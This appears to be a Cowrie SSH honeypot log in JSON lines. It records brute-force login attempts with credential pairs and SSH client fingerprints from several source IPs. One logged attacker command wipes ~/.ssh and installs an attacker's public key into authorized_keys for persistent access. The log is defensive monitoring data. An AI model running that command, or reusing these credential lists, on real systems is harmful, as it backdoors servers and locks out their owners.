{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.363060Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:18.540355Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.541075Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.575960Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.576836Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":35882,"dst_ip":"1.2.3.4","dst_port":22,"session":"d0053ccc4ffb","protocol":"ssh","message":"New connection: 51.250.72.176:35882 (1.2.3.4:22) [session: d0053ccc4ffb]","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.622089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.623042Z","src_ip":"51.250.72.176","session":"d0053ccc4ffb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.662472Z","src_ip":"51.250.72.176","session":"d0053ccc4ffb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.860591Z","src_ip":"51.250.72.176","session":"d0053ccc4ffb"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.957864Z","src_ip":"152.32.129.236","session":"b230d0f1a05b"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.166587Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.167463Z","src_ip":"152.32.129.236","session":"b230d0f1a05b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.902639Z","src_ip":"51.250.72.176","session":"d0053ccc4ffb"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":36154,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0a106ef41d8","protocol":"ssh","message":"New connection: 51.250.72.176:36154 (1.2.3.4:22) [session: b0a106ef41d8]","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.924102Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.925168Z","src_ip":"51.250.72.176","session":"b0a106ef41d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:19.955950Z","src_ip":"51.250.72.176","session":"b0a106ef41d8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:31:20.122162Z","src_ip":"51.250.72.176","session":"b0a106ef41d8"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:20.154645Z","src_ip":"51.250.72.176","session":"b0a106ef41d8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:20.155551Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51904,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce93f514b559","protocol":"ssh","message":"New connection: 212.227.125.160:51904 (1.2.3.4:22) [session: ce93f514b559]","sensor":"my-vps","timestamp":"2025-09-09T00:31:21.769958Z"}
{"eventid":"cowrie.client.version","version":"\u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003tZ\\xac\\xea\r\\xca<ZA\u0004t{\\xae\\xc5dp\\xbe\\x89\u001bk\\xbc-\\x88\\xfbX\\xf8\\xa3\u001b\\x80*\\x8a\\xd8\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","message":"Remote SSH version: \u0016\u0003\u0001\u0000{\u0001\u0000\u0000w\u0003\u0003tZ\\xac\\xea\r\\xca<ZA\u0004t{\\xae\\xc5dp\\xbe\\x89\u001bk\\xbc-\\x88\\xfbX\\xf8\\xa3\u001b\\x80*\\x8a\\xd8\u0000\u0000\u001a\\xc0/\\xc0+\\xc0\u0011\\xc0\u0007\\xc0\u0013\\xc0\t\\xc0\u0014\\xc0","sensor":"my-vps","timestamp":"2025-09-09T00:31:21.770646Z","src_ip":"212.227.125.160","session":"ce93f514b559"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:21.771623Z","src_ip":"212.227.125.160","session":"ce93f514b559"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":56812,"dst_ip":"1.2.3.4","dst_port":22,"session":"da352e93d7d7","protocol":"ssh","message":"New connection: 103.100.209.195:56812 (1.2.3.4:22) [session: da352e93d7d7]","sensor":"my-vps","timestamp":"2025-09-09T00:31:37.908261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:37.915290Z","src_ip":"103.100.209.195","session":"da352e93d7d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:38.116070Z","src_ip":"103.100.209.195","session":"da352e93d7d7"}
{"eventid":"cowrie.login.failed","username":"status","password":"qwerty","message":"login attempt [status/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:31:38.925011Z","src_ip":"103.100.209.195","session":"da352e93d7d7"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:40.129299Z","src_ip":"103.100.209.195","session":"da352e93d7d7"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":57586,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf285c05d53a","protocol":"ssh","message":"New connection: 43.156.132.147:57586 (1.2.3.4:22) [session: cf285c05d53a]","sensor":"my-vps","timestamp":"2025-09-09T00:32:09.822984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:32:09.824529Z","src_ip":"43.156.132.147","session":"cf285c05d53a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:32:10.078140Z","src_ip":"43.156.132.147","session":"cf285c05d53a"}
{"eventid":"cowrie.login.failed","username":"white","password":"pass","message":"login attempt [white/pass] failed","sensor":"my-vps","timestamp":"2025-09-09T00:32:11.150452Z","src_ip":"43.156.132.147","session":"cf285c05d53a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:32:12.416666Z","src_ip":"43.156.132.147","session":"cf285c05d53a"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54914,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a5a1756b9c7","protocol":"ssh","message":"New connection: 217.72.205.35:54914 (1.2.3.4:22) [session: 2a5a1756b9c7]","sensor":"my-vps","timestamp":"2025-09-09T00:32:18.870496Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:32:18.871591Z","src_ip":"217.72.205.35","session":"2a5a1756b9c7"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":33888,"dst_ip":"1.2.3.4","dst_port":22,"session":"c126d9b67176","protocol":"ssh","message":"New connection: 51.250.72.176:33888 (1.2.3.4:22) [session: c126d9b67176]","sensor":"my-vps","timestamp":"2025-09-09T00:32:20.142200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:32:20.143472Z","src_ip":"51.250.72.176","session":"c126d9b67176"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:32:20.183014Z","src_ip":"51.250.72.176","session":"c126d9b67176"}
{"eventid":"cowrie.login.failed","username":"dokku","password":"dokku","message":"login attempt [dokku/dokku] failed","sensor":"my-vps","timestamp":"2025-09-09T00:32:20.384122Z","src_ip":"51.250.72.176","session":"c126d9b67176"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:32:21.426782Z","src_ip":"51.250.72.176","session":"c126d9b67176"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":38722,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e5c0ad6b492","protocol":"ssh","message":"New connection: 152.32.129.236:38722 (1.2.3.4:22) [session: 2e5c0ad6b492]","sensor":"my-vps","timestamp":"2025-09-09T00:32:31.556732Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:32:31.557729Z","src_ip":"152.32.129.236","session":"2e5c0ad6b492"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:32:31.756021Z","src_ip":"152.32.129.236","session":"2e5c0ad6b492"}
{"eventid":"cowrie.login.failed","username":"black","password":"qwerty","message":"login attempt [black/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T00:32:32.594734Z","src_ip":"152.32.129.236","session":"2e5c0ad6b492"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:32:33.794589Z","src_ip":"152.32.129.236","session":"2e5c0ad6b492"}
{"eventid":"cowrie.session.connect","src_ip":"103.100.209.195","src_port":41529,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf4ce33c7d39","protocol":"ssh","message":"New connection: 103.100.209.195:41529 (1.2.3.4:22) [session: bf4ce33c7d39]","sensor":"my-vps","timestamp":"2025-09-09T00:32:45.933090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:32:45.937214Z","src_ip":"103.100.209.195","session":"bf4ce33c7d39"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:32:46.137126Z","src_ip":"103.100.209.195","session":"bf4ce33c7d39"}
{"eventid":"cowrie.login.failed","username":"roo","password":"1234567","message":"login attempt [roo/1234567] failed","sensor":"my-vps","timestamp":"2025-09-09T00:32:46.935407Z","src_ip":"103.100.209.195","session":"bf4ce33c7d39"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:32:48.142047Z","src_ip":"103.100.209.195","session":"bf4ce33c7d39"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":59600,"dst_ip":"1.2.3.4","dst_port":22,"session":"b4c785fa487f","protocol":"ssh","message":"New connection: 5.202.105.236:59600 (1.2.3.4:22) [session: b4c785fa487f]","sensor":"my-vps","timestamp":"2025-09-09T00:33:20.036039Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:33:20.046619Z","src_ip":"5.202.105.236","session":"b4c785fa487f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:33:20.204794Z","src_ip":"5.202.105.236","session":"b4c785fa487f"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"12345678","message":"login attempt [nginx/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T00:33:20.819336Z","src_ip":"5.202.105.236","session":"b4c785fa487f"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:33:21.954296Z","src_ip":"5.202.105.236","session":"b4c785fa487f"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":60262,"dst_ip":"1.2.3.4","dst_port":22,"session":"b389b1ea596f","protocol":"ssh","message":"New connection: 51.250.72.176:60262 (1.2.3.4:22) [session: b389b1ea596f]","sensor":"my-vps","timestamp":"2025-09-09T00:33:22.299469Z"}
